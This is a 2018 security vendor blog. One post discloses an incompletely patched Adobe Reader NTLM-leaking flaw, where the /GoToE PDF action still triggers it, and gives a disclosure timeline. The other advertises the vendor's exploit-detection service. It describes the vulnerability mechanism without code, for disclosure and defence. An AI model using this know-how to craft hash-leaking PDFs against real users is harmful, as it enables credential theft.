Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing a NTLM leaking vulnerability on Adobe Reader & Foxit Reader. Later, Adobe released a security advisory claiming the vulnerability was fixed since Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability were successfully patched by Adobe, and the other variant was not actually addressed.

The story
Recently, during a testing for our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples producing interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They looks like the following:

[Update on Nov. 14]
Users of edgespot.io will find the Detection Details of this particular threat have been changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)", starting today. This is because today we modified the description of the threat, to reflect that the patch is available and a CVE ID is assigned to this threat.

Could it be a false detection? Of course it could be. Given that the techniques of attacking are always evolving, exploit detection is not an easy task.

In order to confirm this test result, we fired up our VM, updated it to the latest Adobe Reader version, and tested those two samples manually. We observed that those two samples still making the NTLM traffic going out.

After further research, we confirmed that those two samples are actually exploiting the same or similar vulnerability CVE-2018-4993, which was discussed by the Check Point blog post we mentioned earlier. As in the Check Point blog, it stated:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found the key parts of the two pdfs are:

They both use the “/GotoE” keyword to trigger the NTLM leaking. We later confirmed that while the method of "/GotoR" was patched by Adobe, the method of "/GotoE" was not.

We conclude this is a failure patching of the CVE-2018-4993 rather than a new vulnerability because the Check Point blog mentioned this variant when disclosing the CVE-2018-4993. Please note we do not know if both variants (“/GoToR” and “/GoToE”) were reported to Adobe by Check Point, but clearly, one variant was not fixed.

Nevertheless, from the view of protecting users, it is a big deal for following reasons:
  1. This is about a zero-day (no patch) exploit.
  2. The detail of the zero-day exploit has been in the public for more than 5 months.
  3. Regarding the two samples on VT (it's likely there's more, although we found these two samples by chance), we do not know why they were submitted to VT and who did it, there is possibility that bad guys realized this variant was not patched so trying to test their zero-day exploits.
We realized this is an important finding, therefore, we reported to Adobe as fast as we can regardless of our busy agenda of developing the system & website for edgespot.io. We are happy that they took this issue quickly and patched it fast, here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding & notified us they plan to release a patch on Nov. 13
2018.11.13 patch released & blog post released

We ask users to patch their Adobe Reader as soon as possible, please follow Adobe's security advisory released today.

This finding proves the power of our EdgeLogic engine that behinds the https://edgespot.io - it has outstanding capability of identifying unknown & zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter some suspicious samples, no matter it is an email format (eml, msg), Office files (doc, xls, ppt), pdf, or even .zip, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two that used internal IP addresses, this one used an external IP address, which looks more likely a real in-the-wild attack.We're sharing this info to help the security community on threat intelligence.

Sunday, November 4, 2018

Announcing edgespot.io - a free exploit detection service with cutting-edge techniques!

Today, we're excited to announce the general availability (BETA) of edgespot.io - a free exploit detection service with cutting-edge techniques!

Today's cyber attacks especially those advanced ones, usually start with an exploit. For instance, the "embedded" malware may run as soon as the user opens an email with an attachment. They may exploit patched vulnerabilities since the fact is that not all users patch their various software in time. Furthermore, they may exploit zero-day vulnerabilities, leaving the victim a "nowhere to go" position.

Edgespot.io is specifically built for fighting against those advanced threats. It works like the way of the famous virustotal.com - you upload a file and it tells whether the file is malicious. However, they have huge differences.
  1. edgespot.io does NOT rely on or use any other malware or exploit detection engine, it is powered by our own (independent) EdgeLogic exploit analysis engine.
  2. edgespot.io does NOT accept "executable" samples (e.g. .exe/.dll), instead, it's developed for detecting client-side exploit samples (for now). The most popular sample types we're currently dealing with are Microsoft Office files (Word, Excel, PowerPoint), PDFs, emails, etc.
After a file is submitted on edgespot.io, it will be analyzed by our EdgeLogic system, which is an innovative exploit analysis system invented and built by us. The system is powered by various cutting-edge technologies such as machine learning, dynamic and static sample analysis, etc., but most importantly, it's built from a sense of exploit research.

Following is a screenshot showing a sample was detected as a CVE-2017-11882 exploit.

Please note that comparing to other malware detection service/product, the advantage of edgespot.io is its outstanding capability of detecting unknown or even zero-day exploits! Based on our in-labs tests, the result is very promising.

We hope you love the service, more details please read our About page here. You may have a try right now.:)

Please do not hesitate to reach us whether via email (contact@edgespot.io) or our contact page or twitter, you're always welcome. Let's work together and make the internet a safer place.

The EdgeSpot team